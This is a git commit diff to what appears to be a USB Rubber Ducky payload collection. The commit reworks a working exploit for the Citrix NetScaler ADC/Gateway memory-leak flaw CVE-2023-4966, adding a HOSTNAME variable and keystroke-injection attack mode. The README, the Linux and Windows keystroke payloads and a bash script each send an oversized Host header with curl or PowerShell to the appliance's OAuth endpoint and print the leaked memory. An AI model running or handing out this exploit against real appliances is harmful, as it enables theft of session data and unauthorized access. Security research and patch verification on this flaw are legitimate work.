Adapted to the use of variables

[+] Added vars [+] Attackmode [-] Img replaced with a link [+] README adapted to the new payload
2024-06-06 16:32:36 +02:00 · 2024-06-06 16:32:36 +02:00 · 9892715933
parent bc056509f0
commit 9892715933
5 changed files with 29 additions and 32 deletions
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe

 This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

-![](./assets/1.png)
+![](https://i.ibb.co/x7SRvGf/1.png)

 ***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*

 ## Settings

-The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
+The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.

-```DuckyScript
-* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+```plaintext
+HOSTNAME='192.168.1.200'
+...
+QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 ```

 ## Payload Description Windows
@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header
 $headers = @{ 'Host' = $header_value }
 ```

-This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
+This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).

 ```powershell
-$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 ```

 Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'"
 This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.

 ```bash
-response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
 ```

 In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating
 if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
    echo "--- Dumped memory ---"
    echo "$response" | cut -c 131051-
-    echo "The #HOSTNAME is vulnerable!"
+    echo "The $HOSTNAME is vulnerable!"
    echo "---      End      ---"
 else
    echo "Could not dump memory"
@ -148,7 +149,7 @@ fi

 ## Script sh

-The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
+The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.

 Example Execution:

@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th

 ## Sources

- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
+1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
+2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/

 ## Credits

-<h2 align="center"> Aleff</h2>
+<h2 align="center">Aleff</h2>
 <div align=center>
 <table>
  <tr>
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
@ -8,24 +8,24 @@
 * REM #                                                                                #
 * REM ##################################################################################

-* REM GNU/Linux Version
+ATTACKMODE HID
+
+QUACK REM VARIABLES
+* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
+HOSTNAME='192.168.1.200'

 QUACK DELAY 3000
 QUACK CTRL-ALT t
 QUACK DELAY 1000
-
 QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING headers="-H 'Host:$header_value'"
 QUACK ENTER
 QUACK DELAY 500
-
-* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
 QUACK ENTER
 QUACK DELAY 500
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh
@ -1,12 +1,12 @@
 #!/bin/bash

-hostname="$1" # first parameter
+HOSTNAME="$1" # first parameter

 header_value=$(yes a | head -n 24576 | tr -d '\n')

 headers="-H 'Host:$header_value'"

-response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)

 if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
 	echo "--- Dumped memory ---"
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
@ -8,7 +8,11 @@
 * REM #                                                                                #
 * REM ##################################################################################

-* REM Windows Version
+ATTACKMODE HID
+
+QUACK REM VARIABLES
+* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
+HOSTNAME='192.168.1.200'

 QUACK DELAY 3000
 QUACK GUI r
@ -16,30 +20,24 @@ QUACK DELAY 500
 QUACK STRING powershell
 QUACK ENTER
 QUACK DELAY 1000
-
 QUACK STRING $header_value = 'a' * 24576
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $header_value = $header_value -replace "\n", ""
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING $headers="-H 'Host:$header_value'"
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING $headers = @{'Host' = $header_value}
 QUACK ENTER
 QUACK DELAY 500
-
-* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING if ($response.Substring(0, 3) -eq "200") {
 QUACK ENTER
 QUACK DELAY 500